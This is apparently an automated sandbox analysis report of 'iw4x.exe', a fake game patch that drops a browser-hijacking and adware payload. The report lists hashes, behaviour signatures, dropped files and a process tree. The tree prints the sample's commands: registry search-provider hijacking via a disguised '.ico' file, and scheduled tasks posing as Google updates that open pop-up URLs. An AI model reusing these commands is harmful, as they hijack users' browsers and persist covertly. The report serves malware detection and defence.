Analysis

  • max time kernel
    103s
  • max time network
    93s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/06/2024, 17:52

General

  • Target

    iw4x.exe

  • Size

    2.0MB

  • MD5

    c56b3749e634f947687fbc2431d7dacc

  • SHA1

    2bb5934ae11cd6033adadd23844eb179762dc2f5

  • SHA256

    1d2c6dc364d6e2cfb42c03d8731119499a8914c28c41e83db9de568ed35c1787

  • SHA512

    32b8ca3c9a4b277a9656d071d7f750e961ea39c9349bb45e80ecf55f3ae0c01393edeee9b77f44184e7c83a87e8cca3dbf1060c2c0164fc98a7d8be5f4f2d2ce

  • SSDEEP

    49152:s8Wh7ey2CXEkqykl1EEXz8knkYcFDZX5TkMMKCAQMx0LioYbLQNP:sVhsCU/lGEXzZcFtJTpM3AdwioYk

Score
7/10

Malware Config

Signatures

  • Checks computer location settings (2 TTPs, 2 IoCs)

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself (1 IoC)
  • Executes dropped EXE (2 IoCs)
  • Loads dropped DLL (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)

    Using powershell.exe command.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) (1 TTP, 2 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: EnumeratesProcesses (27 IoCs)
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
  • Suspicious use of AdjustPrivilegeToken (7 IoCs)
  • Suspicious use of FindShellTrayWindow (25 IoCs)
  • Suspicious use of SendNotifyMessage (24 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
    "C:\Users\Admin\AppData\Local\Temp\iw4x.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe
      "C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" C:\Users\Admin\AppData\Local\Temp
      2⤵
      • Checks computer location settings
      • Deletes itself
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
        "C:\Users\Admin\AppData\Local\Temp\iw4x.exe"
        3⤵
        • Executes dropped EXE
        PID:4456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tidy.bat" "C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe" "DefaultSearchProvider" "HKEY_LOCAL_MACHINE\SOFTWARE\\" "GPR" "CJ_2024-06" "x4w-3,99" "Windows Registry Editor" "{9948E670-2679-4580-953E-995422B950C4}""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pop-broker.com/?FORM=nwlcjstart&subid=GPR&bucket=x4w-3,99&q=&cid={9948E670-2679-4580-953E-995422B950C4}
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4340
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x70,0x128,0x7ffb1b6546f8,0x7ffb1b654708,0x7ffb1b654718
            5⤵
            PID:3164
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
            5⤵
            PID:5080
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2276
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
            5⤵
            PID:864
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
            5⤵
            PID:452
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
            5⤵
            PID:3148
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
            5⤵
            PID:1804
          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
            5⤵
            PID:1628
          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4532
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
            5⤵
            PID:4888
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
            5⤵
            PID:3892
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
            5⤵
            PID:4864
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,12037339697783418585,1417078121568857256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
            5⤵
            PID:1492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(10).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "$input = '6/25/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
          4⤵
          PID:1392
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "$input = '6/25/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "$s = '6/25/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
          4⤵
          PID:1140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "$s = '6/25/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "GoogleUpdateWeekly" /sc daily /sd 06/25/2024 /st 00:00 /ri 60 /du 24:00 /rl highest /f /tr "regedit.exe /s \"C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico\" "
          4⤵
          • Creates scheduled task(s)
          PID:3108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
          4⤵
          PID:3380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "[cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern; (Get-Date).AddDays(29).ToString([cultureinfo]::CurrentCulture.DateTimeFormat.ShortDatePattern)"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "$input = '7/14/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
          4⤵
          PID:4576
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "$input = '7/14/2024'; $cleaned = $input -replace '[a-zA-Z0-9]', ''; if ($cleaned.Length -gt 0) { $cleaned[0] } else { '.' }"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -Command "$s = '7/14/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
          4⤵
          PID:2572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "$s = '7/14/2024'.Split('/'); $res = $s | ForEach-Object { if ($_.Length -lt 2) { '0' + $_ } else { $_ } }; $res -join '/'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2212
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "GoogleUpdateDaily" /sc daily /mo 1 /sd 07/14/2024 /st 00:00 /ri 360 /du 24:00 /rl highest /f /tr "cmd /c start "https://www.pop-broker.com/?FORM=nwlcjpop^&subid=GPR^&bucket=CJ_2024-06^&q=x4w-3,99^&cid={9948E670-2679-4580-953E-995422B950C4}" "
          4⤵
          • Creates scheduled task(s)
          PID:4420
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico').Replace('{HKS}', '"HKEY_LOCAL_MACHINE\SOFTWARE\\"').Replace('{DSP}', '"DefaultSearchProvider"').Replace('{subid}', '"GPR"').Replace('{bucket}', '"CJ_2024-06"').Replace('{WRE}', '"Windows Registry Editor"').Replace('{hash}', '"{9948E670-2679-4580-953E-995422B950C4}"') | Set-Content -Path 'C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4092
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2336
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:716

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize 1KB
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize 152B
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize 152B
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
    Filesize 203KB
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
    Filesize 120B
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize 6KB
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize 6KB
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
    Filesize 16B
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    Filesize 11KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 16KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 12KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 13KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 16KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 12KB
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 13KB
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmkomjyi.mb4.ps1
    Filesize 60B
  • C:\Users\Admin\AppData\Local\Temp\iw4x.exe
    Filesize 4.0MB
                                      • C:\Users\Admin\AppData\Local\Temp\iw4x_patch-run.exe

                                        Filesize

                                        2.0MB

                                        MD5

                                        c56b3749e634f947687fbc2431d7dacc

                                        SHA1

                                        2bb5934ae11cd6033adadd23844eb179762dc2f5

                                        SHA256

                                        1d2c6dc364d6e2cfb42c03d8731119499a8914c28c41e83db9de568ed35c1787

                                        SHA512

                                        32b8ca3c9a4b277a9656d071d7f750e961ea39c9349bb45e80ecf55f3ae0c01393edeee9b77f44184e7c83a87e8cca3dbf1060c2c0164fc98a7d8be5f4f2d2ce

                                      • C:\Users\Admin\AppData\Local\Temp\nsr3C89.tmp\System.dll

                                        Filesize

                                        12KB

                                        MD5

                                        4add245d4ba34b04f213409bfe504c07

                                        SHA1

                                        ef756d6581d70e87d58cc4982e3f4d18e0ea5b09

                                        SHA256

                                        9111099efe9d5c9b391dc132b2faf0a3851a760d4106d5368e30ac744eb42706

                                        SHA512

                                        1bd260cabe5ea3cefbbc675162f30092ab157893510f45a1b571489e03ebb2903c55f64f89812754d3fe03c8f10012b8078d1261a7e73ac1f87c82f714bce03d

                                      • C:\Users\Admin\AppData\Local\Temp\temp_cleanup.ico

                                        Filesize

                                        3KB

                                        MD5

                                        9b1f2ba66882fc6ade477add10e636f9

                                        SHA1

                                        8c7cc3c604ce7ec012f236e24e926b1c29095c52

                                        SHA256

                                        ca29f5e70948b08551f7ef9306eac77a86aa0f4cefc669b5a7fe1f79a4d5eec5

                                        SHA512

                                        1a757efee892643bf6b2d99dc48457f2b16a5ec849a9db9c01f2dcae4f686e021d1dc55529ea4ffab311318a14955913b334056807471c4436ba9d2d0749671f

                                      • C:\Users\Admin\AppData\Local\Temp\tidy.bat

                                        Filesize

                                        5KB

                                        MD5

                                        0f87163cbdd0446b5324cce930be8c8b

                                        SHA1

                                        bbc7aa9471d7a89de11e1fcf83c6a7b654509293

                                        SHA256

                                        9a181f2597a6da871e10ea6d071726741634af68b2158edb649620c020d2bb0c

                                        SHA512

                                        727a3d9228121808871f8741bb0222ed29c7ab69b221b858efaf270a391266d6667b0897ee4aad3c446f38150f7bcb47ce3519c20878368909fe280f43825693

                                      • memory/2676-48-0x0000000005F80000-0x0000000005FE6000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/2676-46-0x0000000005E30000-0x0000000005E52000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/2676-80-0x00000000076D0000-0x00000000076EA000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/2676-79-0x0000000007D80000-0x00000000083FA000-memory.dmp

                                        Filesize

                                        6.5MB

                                      • memory/2676-70-0x00000000065F0000-0x000000000663C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/2676-69-0x00000000065C0000-0x00000000065DE000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/2676-61-0x0000000005FF0000-0x0000000006344000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/2676-38-0x0000000004FF0000-0x0000000005026000-memory.dmp

                                        Filesize

                                        216KB

                                      • memory/2676-39-0x00000000057B0000-0x0000000005DD8000-memory.dmp

                                        Filesize

                                        6.2MB

                                      • memory/2676-47-0x0000000005F10000-0x0000000005F76000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/2972-102-0x0000000005E90000-0x00000000061E4000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/2972-104-0x0000000006870000-0x00000000068BC000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/4092-169-0x0000000006C60000-0x0000000006CF6000-memory.dmp

                                        Filesize

                                        600KB

                                      • memory/4092-176-0x0000000006D80000-0x0000000006D9E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/4092-175-0x0000000006DD0000-0x0000000006E46000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/4092-171-0x0000000007300000-0x00000000078A4000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/4092-170-0x0000000006010000-0x0000000006032000-memory.dmp

                                        Filesize

                                        136KB